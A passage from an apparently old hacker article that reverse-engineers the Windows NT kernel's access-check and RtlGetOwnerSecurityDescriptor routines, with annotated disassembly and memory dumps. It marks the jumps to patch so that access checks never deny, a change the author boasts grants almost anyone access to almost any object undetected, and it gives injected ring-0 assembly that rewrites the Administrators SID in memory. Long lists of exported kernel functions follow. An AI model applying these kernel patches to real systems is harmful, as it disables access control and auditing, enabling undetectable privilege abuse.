to this point ; as we traverse each ACE ; the EDI register is modified ; with each ACE's access mask ; if a SID match occurs. ; Access is allowed only if ; EDI is completely blank ; by the time we are done. :-) 80199AE9 jz loc_80199B79 ; jumps to exit routine ; if EDI is blank 80199AEF test byte ptr [esi+1], 8 ; checks for ACE value ; 8, second byte.. ; i dont know what ; this is, but if it's ; not 8, its not ; evaluated, not ; important 80199AF3 jnz short loc_80199B64 80199AF5 mov al, [esi] ; this is the ACE type, ; which is 0, 1, or 4 80199AF7 test al, al ; 0 is ALLOWED_TYPE and ; 1 is DENIED_TYPE 80199AF9 jnz short loc_80199B14 ; jump to next block if ; it's not type 0 80199AFB lea eax, [esi+8] ; offset 8 is the SID 80199AFE push eax ; pushes the ACE 80199AFF push [ebp+var_8] 80199B02 call sub_801997C2 ; checks to see if the ; caller matches the ; SID return of 1 says ; we matched, 0 means ; we did not 80199B07 test al, al 80199B09 jz short loc_80199B64 ; a match here is good, ; since its the ALLOWED ; list ; so a 2 byte patch can ; NOP out this jump ; <PATCH ME> 80199B0B mov eax, [esi+4] 80199B0E not eax 80199B10 and edi, eax ; whiddles off the part ; of EDI that we ; matched .. ; this chopping of ; flags can go on through ; many loops ; remember, we are only ; good if ALL of EDI is ; chopped away... 80199B12 jmp short loc_80199B64 80199B14 ; =========================================================================== 80199B14 80199B14 loc_80199B14: ; CODE XREF: sub_80199836+2C3 80199B14 cmp al, 4 ; check for ACE type 4 80199B16 jnz short loc_80199B4B ; normally we aren't ; this type, so jump *** removed source here *** 80199B4B ; =========================================================================== 80199B4B 80199B4B loc_80199B4B: ; CODE XREF: sub_80199836+2E0j 80199B4B cmp al, 1 ; check for DENIED type 80199B4D jnz short loc_80199B64 80199B4F lea eax, [esi+8] ; offset 8 is the SID 80199B52 push eax 80199B53 push [ebp+var_8] 80199B56 call sub_801997C2 ; check the callers SID 80199B5B test al, al ; a match here is BAD, ; since we are being ; DENIED 80199B5D jz short loc_80199B64 ; so make JZ a normal ; JMP <PATCH ME> 80199B5F test [esi+4], edi ; we avoid this flag ; check w/ the patch 80199B62 jnz short loc_80199B79 80199B64 80199B64 loc_80199B64: ; CODE XREF: sub_80199836+2BD 80199B64 ; sub_80199836+2D3 80199B64 mov ecx, [ebp+var_10] ; our loop routine, ; called from above as ; we loop around and ; around. ; var_10 is the number ; of ACE's 80199B67 inc [ebp+var_C] ; var_C is the current ; ACE 80199B6A movzx eax, word ptr [esi+2] ; byte 3 is the offset ; to the next ACE 80199B6E add esi, eax ; FFWD 80199B70 cmp [ebp+var_C], ecx ; check to see if we ; are done 80199B73 jb loc_80199AE7 ; if not, go back up... 80199B79 80199B79 loc_80199B79: ; CODE XREF: sub_80199836+2AB 80199B79 ; sub_80199836+2B3 80199B79 xor eax, eax ; this is our general ; exit routine 80199B7B test edi, edi ; if EDI isnt empty, ; then a DENIED state ; was reached above 80199B7D jz short loc_80199B91 ; so patch the JZ into ; a JMP so we never ; return ACCESS_DENIED ; <PATCH ME> 80199B7F mov ecx, [ebp+arg_1C] 80199B82 mov [ecx], eax 80199B84 mov eax, [ebp+arg_24] ; STATUS_ACCESS_DENIED 80199B87 mov dword ptr [eax], 0C0000022h 80199B8D xor al, al 80199B8F jmp short loc_80199C0C 80199B91 ; =========================================================================== 80199B91 80199B91 loc_80199B91: ; CODE XREF: sub_80199836+347 80199B91 mov eax, [ebp+1Ch] 80199B94 mov ecx, [ebp+arg_1C] ; result code into ; &arg_1C 80199B97 or eax, [ebp+arg_C] ; checked passed in ; mask 80199B9A mov [ecx], eax 80199B9C mov ecx, [ebp+arg_24] ; result code into ; &arg_24, should be ; zero 80199B9F jnz short loc_80199BAB ; if everything above ; went OK, we should jump 80199BA1 xor al, al 80199BA3 mov dword ptr [ecx], 0C0000022h 80199BA9 jmp short loc_80199C0C 80199BAB ; =========================================================================== 80199BAB 80199BAB loc_80199BAB: ; CODE XREF: sub_80199836+369 80199BAB mov dword ptr [ecx], 0 ; Good and Happy ; things, we passed! 80199BB1 test ebx, ebx 80199BB3 jz short loc_80199C0A 80199BB5 push [ebp+arg_20] 80199BB8 push dword ptr [ebp+var_2] 80199BBB push dword ptr [ebp-1] 80199BBE push ebx 80199BBF call sub_8019DC80 80199BC4 jmp short loc_80199C0A 80199BC6 ; =========================================================================== removed code here 80199C0A loc_80199C0A: ; CODE XREF: sub_80199836+123 80199C0A ; sub_80199836+152 80199C0A mov al, 1 80199C0C 80199C0C loc_80199C0C: ; CODE XREF: sub_80199836+55 80199C0C ; sub_80199836+8F 80199C0C pop edi 80199C0D pop esi 80199C0E pop ebx 80199C0F mov esp, ebp 80199C11 pop ebp 80199C12 retn 28h ; Outta Here! 80199C12 sub_80199836 endp Whew! Some STRUCTURE dumps along the way: :d eax 0023:E1A1C174 01 00 04 80 DC 00 00 00-EC 00 00 00 00 00 00 00 ................ ; this looks like a SD 0023:E1A1C184 14 00 00 00 02 00 C8 00-08 00 00 00 00 09 18 00 ................ 0023:E1A1C194 00 00 00 10 01 01 00 00-00 00 00 03 00 00 00 00 ................ 0023:E1A1C1A4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00 ................ 0023:E1A1C1B4 00 00 00 03 00 00 00 00-00 00 00 00 00 09 18 00 ................ 0023:E1A1C1C4 00 00 00 10 01 01 00 00-00 00 00 05 12 00 00 00 ................ 0023:E1A1C1D4 00 00 00 00 00 02 18 00-FF 01 1F 00 01 01 00 00 ................ 0023:E1A1C1E4 00 00 00 05 12 00 00 00-00 00 00 00 00 09 18 00 ................ :d esi 0023:E1A1C188 02 00 C8 00 08 00 00 00-00 09 18 00 00 00 00 10 ................ ; OFFSET into the SD (DACL) 0023:E1A1C198 01 01 00 00 00 00 00 03-00 00 00 00 00 00 00 00 ................ 0023:E1A1C1A8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 03 ................ 0023:E1A1C1B8 00 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10 ................ 0023:E1A1C1C8 01 01 00 00 00 00 00 05-12 00 00 00 00 00 00 00 ................ 0023:E1A1C1D8 00 02 18 00 FF 01 1F 00-01 01 00 00 00 00 00 05 ................ 0023:E1A1C1E8 12 00 00 00 00 00 00 00-00 09 18 00 00 00 00 10 ................ 0023:E1A1C1F8 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00 ........ ... ... The following formats appear to be the SD, DACL, and ACE: SD: -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- r | |04|80|fo| | | |fg| | | | | | |fd| | --==> -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- r: Revision, must be 1 fo: Offset to Owner SID fg: Offset to Group SID fd: Offset to DACL ACL: -- -- -- -- -- -- -- -- -- -- r | | | |na| | | |sa| | --==> -- -- -- -- -- -- -- -- -- -- r: Revision? na: Number of ACE's sa: Start of first ACE ACE: -- -- -- -- -- -- -- -- -- -- t |i |oa| |am| | | |ss| | --==> -- -- -- -- -- -- -- -- -- -- t: type, 0, 1, or 4 i: the ACE is ignored if this value isn't 8 oa: offset to next ACE am: access mask associated with this SID ss: start of the SID, normally at offset 8, but for ACE type 4, will be at offset 0Ch So there you have it, a 4 byte patch. Application of this patch will allow almost anyone access to almost any object on your NT domain. Also, it is undetectable when auditing ACL's and the such. The only indication something is wrong is the fact your now opening the SAM database from a normal account w/o a hitch... I can kill any process without being denied access.. God knows what the NULL User session can get away with!. I like that. 8-/. Gee, it's almost USEFUL isn't it? Reverse Engineering & Patch of the RTLGetOwnerSecurityDescriptor() function --------------------------------------------------------------------------- As if the last patch wasn't good enough, this patch should illustrate how easy it is add your own code to the Kernel. Simply by patching a single jump, I was able to detour the execution path into a highwayman's patch, and return back to normal execution without a hitch. This patch alters a SID in memory, violating the integrity of the security system. With a little creative light, this patch could be so much more. There are hundreds of routines in the ntoskrnl.exe. You are executing your own code in ring-0, so anything is possible. If for any other reason, this paper should open your mind to the possibilities. Reversing the NT Kernel is nothing new, I am quite sure. I would bet that the NSA has the full source to the NT Kernel, and has written some very elaborate patches. In fact, they were probably on that for NT 3.5. 80184AAC ; =========================================================================== 80184AAF align 4 80184AB0 ; Exported entry 719. RtlGetOwnerSecurityDescriptor 80184AB0 80184AB0 ; =========================================================================== 80184AB0 80184AB0 ; S u b r o u t i n e 80184AB0 ; Attributes: bp-based frame 80184AB0 80184AB0 public RtlGetOwnerSecurityDescriptor 80184AB0 RtlGetOwnerSecurityDescriptor proc near ; CODE XREF: sub_8018F318+22 80184AB0 80184AB0 arg_0 = dword ptr 8 80184AB0 arg_4 = dword ptr 0Ch 80184AB0 arg_8 = dword ptr 10h 80184AB0 80184AB0 push ebp 80184AB1 mov edx, [esp+arg_0] 80184AB5 mov ebp, esp 80184AB7 push esi // // MessageId: STATUS_UNKNOWN_REVISION // // MessageText: // // Indicates a revision number encountered or specified is not one // known by the service. It may be a more recent revision than the // service is aware of. // #define STATUS_UNKNOWN_REVISION ((NTSTATUS)0xC0000058L) On SD Revision: The user mode function InitializeSecurityDescriptor() will set the revision number for the SD. The InitializeSecurityDescriptor() function initializes a new security descriptor. BOOL InitializeSecurityDescriptor( PSECURITY_DESCRIPTOR pSecurityDescriptor, // address of security descriptor DWORD dwRevision // revision level ); Parameters: pSecurityDescriptor: Points to a SECURITY_DESCRIPTOR structure that the function initializes. dwRevision: Specifies the revision level to assign to the security descriptor. This must be SECURITY_DESCRIPTOR_REVISION. 80184AB8 cmp byte ptr [edx], 1 ; Ptr to decimal ; value usually 01, ; (SD Revision) 80184ABB jz short loc_80184AC4 ; STATUS CODE (STATUS_UNKNOWN_REVISION) 80184ABD mov eax, 0C0000058h 80184AC2 jmp short loc_80184AF3 ; will exit The next block here does some operations against the object stored *edx, which is our first argument to this function. I think this may be a SD. There are two different forms of an SD, absolute and relative.. here is the doc: A security descriptor can be in absolute or self-relative form. In self-relative form, all members of the structure are located contiguously in memory. In absolute form, the structure only contains pointers to the members. This [edx] object is passed in as absolute: Argument 1 (a SECURITY_DESCRIPTOR structure): :d edx 0023:E1F47488 01 00 04 80 5C 00 00 00-6C 00 00 00 00 00 00 00 ....\...l....... ; 01 Revision, Flags 04, ; Offset to Owner SID is 5C, ; Offset to Primary Group SID is 6C 0023:E1F47498 14 00 00 00 02 00 48 00-02 00 00 00 00 00 18 00 ......H......... 0023:E1F474A8 FF 00 0F 00 01 02 00 00-00 00 00 05 20 00 00 00 ............ ... 0023:E1F474B8 20 02 00 00 00 00 14 00-FF 00 0F 00 01 01 00 00 ............... 0023:E1F474C8 00 00 00 05 12 00 00 00-00 00 4E 00 C8 FD 14 00 ..........N..... 0023:E1F474D8 E8 00 14 00 41 00 64 00-6D 00 69 00 01 02 00 00 ....A.d.m.i..... ; SIDS start here, see below 0023:E1F474E8 00 00 00 05 20 00 00 00-20 02 00 00 01 05 00 00 .... ... ....... 0023:E1F474F8 00 00 00 05 15 00 00 00-BA 5D FF 0C 5C 4F CF 51 .........]..\O.Q 80184AC4 ; =========================================================================== 80184AC4 80184AC4 loc_80184AC4: ; CODE XREF: ; RtlGetOwnerSecurityDescriptor+B 80184AC4 mov eax, [edx+4] ; we are here if the revision ; is good 80184AC7 xor ecx, ecx 80184AC9 test eax, eax ; 01 00 04 80 >5C< which is ; [edx+4] must not be zero ; if the value IS zero, this ; means the SD does NOT have a ; owner, and it sets argument ; 2 to NULL, then returns, ; ignoring argument 3 ; altogether. 80184ACB jnz short loc_80184AD4 80184ACD mov esi, [ebp+arg_4] 80184AD0 mov [esi], ecx 80184AD2 jmp short loc_80184AE1 80184AD4 ; =========================================================================== 80184AD4 80184AD4 loc_80184AD4: ; CODE XREF: ; RtlGetOwnerSecurityDescriptor+1B 80184AD4 test byte ptr [edx+3], 80h ; 01 00 04 >80< 5C ; which is [edx+3] must be 80 80184AD8 jz short loc_80184ADC 80184ADA add eax, edx ; adds edx to 5C, ; which must be an ; offset to the SID ; within the SD Note a couple of SIDS hanging around in this memory location. The first one is the Owner, the second one must be the Group. The first SID, 1-5-20-220 is BUILTIN\Administrators. By changing the 220 to a 222, we can alter this to be BUILTIN\Guests. This will cause serious security problems. That second SID happens to be long nasty one.. that is your first indication that it's NOT a built-in group. In fact, in this case, the group is ANSUZ\None, a local group on my NT Server (my server is obviously named ANSUZ.. ;) :d eax 0023:E1A49F84 01 02 00 00 00 00 00 05-20 00 00 00 20 02 00 00 ........ ... ... ; This is a SID in memory (1-5-20-220) 0023:E1A49F94 01 05 00 00 00 00 00 05-15 00 00 00 BA 5D FF 0C .............].. ; another SID 0023:E1A49FA4 5C 4F CF 51 FD 28 9A 4E-01 02 ; (1-5-15-CFF5DBA-51CF4F5C-4E9A28FD-201) Here we start working with arguments 1 & 2: 80184ADC 80184ADC loc_80184ADC: ; CODE XREF: ; RtlGetOwnerSecurityDescriptor+28 80184ADC mov esi, [ebp+arg_4] 80184ADF mov [esi], eax ; moving the address of the ; SID through the user ; supplied ptr (PSID pOwner) 80184AE1 80184AE1 loc_80184AE1: ; CODE XREF: ; RtlGetOwnerSecurityDescriptor+22 80184AE1 mov ax, [edx+2] ; some sort of flags ; 01 00 >04< 80 5C 80184AE5 mov edx, [ebp+arg_8]; argument 3, which is to be ; filled in with flags data 80184AE8 and al, 1 80184AEA cmp al, 1 ; checking against a mask of ; 0x01 80184AEC setz cl ; set based on flags register ; (if previous compare was true) 80184AEF xor eax, eax ; status is zero, all good ;) 80184AF1 mov [edx], cl ; the value is set for ; SE_OWNER_DEFAULTED ; true/false 80184AF3 80184AF3 loc_80184AF3: ; CODE XREF: ; RtlGetOwnerSecurityDescriptor+12 80184AF3 pop esi 80184AF4 pop ebp 80184AF5 retn 0Ch ; outta here, status in EAX 80184AF5 RtlGetOwnerSecurityDescriptor endp This routine is called from the following stack(s): (NtOpenProcessToken) Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor (ET=31.98 milliseconds) :stack at 001B:00000000 (SS:EBP 0010:00000000) ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8E3FF04) ntoskrnl!NtOpenProcessToken+025E at 0008:80198834 (SS:EBP 0010:F8E3FEEC) ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8E3FE50) ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8E3FD80) ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8E3FD48) ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8E3FD34) ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP 0010:F8E3FD20) => ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP 0010:F8E3FD00) (PsCreateWin32Process) Break due to BPX ntoskrnl!RtlGetOwnerSecurityDescriptor (ET=3.62 milliseconds) :stack ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04) ntoskrnl!PsCreateWin32Process+01E7 at 0008:80192B5D (SS:EBP 0010:F8CDFEDC) ntoskrnl!PsCreateSystemThread+04CE at 0008:8019303E (SS:EBP 0010:F8CDFE6C) ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDC8) ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCF8) ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCC0) ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCAC) ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP 0010:F8CDFC98) => ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP 0010:F8CDFC78) (PsCreateSystemThread) :stack ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04) ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC) ntoskrnl!PsCreateSystemProcess+05FD at 0008:801938B1 (SS:EBP 0010:F8CDFE8C) ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFDEC) ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFD1C) ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFCE4) ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFCD0) ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP 0010:F8CDFCBC) => ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP 0010:F8CDFC9C) (SeTokenImpersonationLevel) :stack ntoskrnl!KiReleaseSpinLock+09C4 at 0008:8013CC94 (SS:EBP 0010:F8CDFF04) ntoskrnl!PsCreateSystemThread+0731 at 0008:801932A1 (SS:EBP 0010:F8CDFEDC) ntoskrnl!PsRevertToSelf+0063 at 0008:8013577D (SS:EBP 0010:F8CDFE8C) ntoskrnl!SeTokenImpersonationLevel+01A3 at 0008:8019F12F (SS:EBP 0010:F8CDFDE8) ntoskrnl!ObInsertObject+026F at 0008:8018CDD5 (SS:EBP 0010:F8CDFD9C) ntoskrnl!ObAssignSecurity+0059 at 0008:801342A3 (SS:EBP 0010:F8CDFCCC) ntoskrnl!SeSinglePrivilegeCheck+018F at 0008:8019E80F (SS:EBP 0010:F8CDFC94) ntoskrnl!ObCheckCreateObjectAccess+0149 at 0008:801340E1 (SS:EBP 0010:F8CDFC80) ntoskrnl!ObQueryObjectAuditingByHandle+1BFB at 0008:8018F413 (SS:EBP 0010:F8CDFC6C) => ntoskrnl!RtlGetOwnerSecurityDescriptor at 0008:80184AB0 (SS:EBP 0010:F8CDFC4C) I began by trying to patch this call. I decided to try and detect the Owner SID of BUILTIN\Administrators (1-5-20-220) and change it to BUILTIN\Users (1-5-20-221) on the fly. The following code is what I patched in: First, I located a region of memory where I could dump some extra code. For testing, I chose the region at 08:8000F2B0. I found it to be initially all zeroed out, so I figured it safe for a while. Next, I assembled some instructions into this new area: 8000F2B0: push ebx mov ebx, [eax + 08] cmp ebx, 20 ; check the 20 in 1-5-20-XXX nop ; nop's are leftovers from ; debugging nop jnz 8000f2c2 ; skip it if we aren't looking ; at a 20 mov word ptr [eax+0c], 221 ; write over old RID w/ new RID ; of 221 nop 8000f2c2: pop ebx nop mov esi, [ebp + 0c] ; the two instructions mov [esi], eax ; that I nuked to make the ; initial jump jmp 80184ae1 Now, notice the last two instructions prior to the jump back to NT. To make this call, I had to install a JMP instruction into the NT subroutine itself. Doing that nuked two actual instructions, as follows: Original code: 80184ADC mov esi, [ebp+arg_4];<**===--- PATCHING A JUMP ; HERE 80184ADF mov [esi], eax 80184AE1 mov ax, [edx+2] ; some sort of flags ; 01 00 >04< 80 5C 80184AE5 mov edx, [ebp+arg_8]; argument 3, which is to be ; filled in with flags data After patch: 80184ADC JMP 8000F2B0 ; Note: this nuked two real ; instructions... 80184AE1 mov ax, [edx+2] ; some sort of flags ; 01 00 >04< 80 5C 80184AE5 mov edx, [ebp+arg_8]; argument 3, which is to be ; filled in with flags data So, to correct this, the code that I am jumping to runs the two missing instructions: mov esi, [ebp + 0c] ; the two instructions mov [esi], eax ; that I nuked to make the ; initial jump Alas, all is good. I tested this patch for quite some time without a problem. To verify that it was working, I checked the memory during the patch, and sure enough, it was turning SID 1-5-20-220 into SID 1-5-20-221. However, as with all projects, I was not out of the water yet. When getting the security properties for a file, the Owner still shows up as Administrators. This patch is clearly called during such a query, as I have set breakpoints. However, the displayed OWNER is still administrators, even though I am patching the SID in memory. Further investigation has revealed that this routine isn't called to check access to a file object, but is called for opening process tokens, creating processes, and creating threads. Perhaps someone could shed some more light on this? Nonetheless, the methods used in this patch can be re-purposed for almost any Kernel routine, so I hope it has been a useful journey. Appendix A: Exported functions for the SRM: ------------------------------------------- SeAccessCheck SeAppendPrivileges SeAssignSecurity SeAuditingFileEvents SeAuditingFileOrGlobalEvents SeCaptureSecurityDescriptor SeCaptureSubjectContext SeCloseObjectAuditAlarm SeCreateAccessState SeCreateClientSecurity SeDeassignSecurity SeDeleteAccessState SeDeleteObjectAuditAlarm SeExports SeFreePrivileges SeImpersonateClient SeLockSubjectContext SeMarkLogonSessionForTerminationNotification SeOpenObjectAuditAlarm SeOpenObjectForDeleteAuditAlarm SePrivilegeCheck SePrivilegeObjectAuditAlarm SePublicDefaultDacl SeQueryAuthenticationIdToken SeQuerySecurityDescriptorInfo SeRegisterLogonSessionTerminatedRoutine SeReleaseSecurityDescriptor SeReleaseSubjectContext SeSetAccessStateGenericMapping SeSetSecurityDescriptorInfo SeSinglePrivilegeCheck SeSystemDefaultDacl SeTokenImpersonationLevel SeTokenType SeUnlockSubjectContext SeUnregisterLogonSessionTerminatedRoutine SeValidSecurityDescriptor Here are the exported functions for the Object Manager: ObAssignSecurity ObCheckCreateObjectAccess ObCheckObjectAccess ObCreateObject ObDereferenceObject ObfDereferenceObject ObFindHandleForObject ObfReferenceObject ObGetObjectPointerCount ObGetObjectSecurity ObInsertObject ObMakeTemporaryObject ObOpenObjectByName ObOpenObjectByPointer ObQueryNameString ObQueryObjectAuditingByHandle ObReferenceObjectByHandle ObReferenceObjectByName ObReferenceObjectByPointer ObReleaseObjectSecurity ObSetSecurityDescriptorInfo Here are the exported functions for the IO Manager: IoAcquireCancelSpinLock IoAcquireVpbSpinLock IoAdapterObjectType IoAllocateAdapterChannel IoAllocateController IoAllocateErrorLogEntry IoAllocateIrp IoAllocateMdl IoAssignResources IoAttachDevice IoAttachDeviceByPointer IoAttachDeviceToDeviceStack IoBuildAsynchronousFsdRequest IoBuildDeviceIoControlRequest IoBuildPartialMdl IoBuildSynchronousFsdRequest IoCallDriver IoCancelIrp IoCheckDesiredAccess IoCheckEaBufferValidity IoCheckFunctionAccess IoCheckShareAccess IoCompleteRequest IoConnectInterrupt IoCreateController IoCreateDevice IoCreateFile IoCreateNotificationEvent IoCreateStreamFileObject IoCreateSymbolicLink IoCreateSynchronizationEvent IoCreateUnprotectedSymbolicLink IoDeleteController IoDeleteDevice IoDeleteSymbolicLink IoDetachDevice IoDeviceHandlerObjectSize IoDeviceHandlerObjectType IoDeviceObjectType IoDisconnectInterrupt IoDriverObjectType IoEnqueueIrp IoFastQueryNetworkAttributes IofCallDriver IofCompleteRequest IoFileObjectType IoFreeController IoFreeIrp IoFreeMdl IoGetAttachedDevice IoGetBaseFileSystemDeviceObject IoGetConfigurationInformation IoGetCurrentProcess IoGetDeviceObjectPointer IoGetDeviceToVerify IoGetFileObjectGenericMapping IoGetInitialStack IoGetRelatedDeviceObject IoGetRequestorProcess IoGetStackLimits IoGetTopLevelIrp IoInitializeIrp IoInitializeTimer IoIsOperationSynchronous IoIsSystemThread IoMakeAssociatedIrp IoOpenDeviceInstanceKey IoPageRead IoQueryDeviceDescription IoQueryDeviceEnumInfo IoQueryFileInformation IoQueryVolumeInformation IoQueueThreadIrp IoRaiseHardError IoRaiseInformationalHardError IoReadOperationCount IoReadTransferCount IoRegisterDriverReinitialization IoRegisterFileSystem IoRegisterFsRegistrationChange IoRegisterShutdownNotification IoReleaseCancelSpinLock IoReleaseVpbSpinLock IoRemoveShareAccess IoReportHalResourceUsage IoReportResourceUsage IoSetDeviceToVerify IoSetHardErrorOrVerifyDevice IoSetInformation IoSetShareAccess IoSetThreadHardErrorMode IoSetTopLevelIrp IoStartNextPacket IoStartNextPacketByKey IoStartPacket IoStartTimer IoStatisticsLock IoStopTimer IoSynchronousPageWrite IoThreadToProcess IoUnregisterFileSystem IoUnregisterFsRegistrationChange IoUnregisterShutdownNotification IoUpdateShareAccess IoVerifyVolume IoWriteErrorLogEntry IoWriteOperationCount IoWriteTransferCount Here are the exported functions for the LSA: LsaCallAuthenticationPackage LsaDeregisterLogonProcess LsaFreeReturnBuffer LsaLogonUser LsaLookupAuthenticationPackage LsaRegisterLogonProcess The only imports are from the HAL DLL: HAL.ExAcquireFastMutex HAL.ExReleaseFastMutex HAL.ExTryToAcquireFastMutex HAL.HalAllocateAdapterChannel HAL.HalBeginSystemInterrupt HAL.HalClearSoftwareInterrupt HAL.HalDisableSystemInterrupt HAL.HalDisplayString HAL.HalEnableSystemInterrupt HAL.HalEndSystemInterrupt HAL.HalGetEnvironmentVariable HAL.HalHandleNMI HAL.HalProcessorIdle HAL.HalQueryDisplayParameters HAL.HalRequestSoftwareInterrupt HAL.HalReturnToFirmware HAL.HalSetEnvironmentVariable HAL.HalSetRealTimeClock HAL.HalStartProfileInterrupt HAL.HalStopProfileInterrupt HAL.HalSystemVectorDispatchEntry HAL.KdPortPollByte HAL.KdPortRestore HAL.KdPortSave HAL.KeGetCurrentIrql HAL.KeLowerIrql HAL.KeRaiseIrql HAL.KeRaiseIrqlToDpcLevel HAL.KeRaiseIrqlToSynchLevel HAL.KfAcquireSpinLock HAL.KfLowerIrql HAL.KfRaiseIrql HAL.KfReleaseSpinLock HAL.READ_PORT_UCHAR HAL.READ_PORT_ULONG HAL.READ_PORT_USHORT HAL.WRITE_PORT_UCHAR HAL.WRITE_PORT_ULONG HAL.WRITE_PORT_USHORT ----[ EOF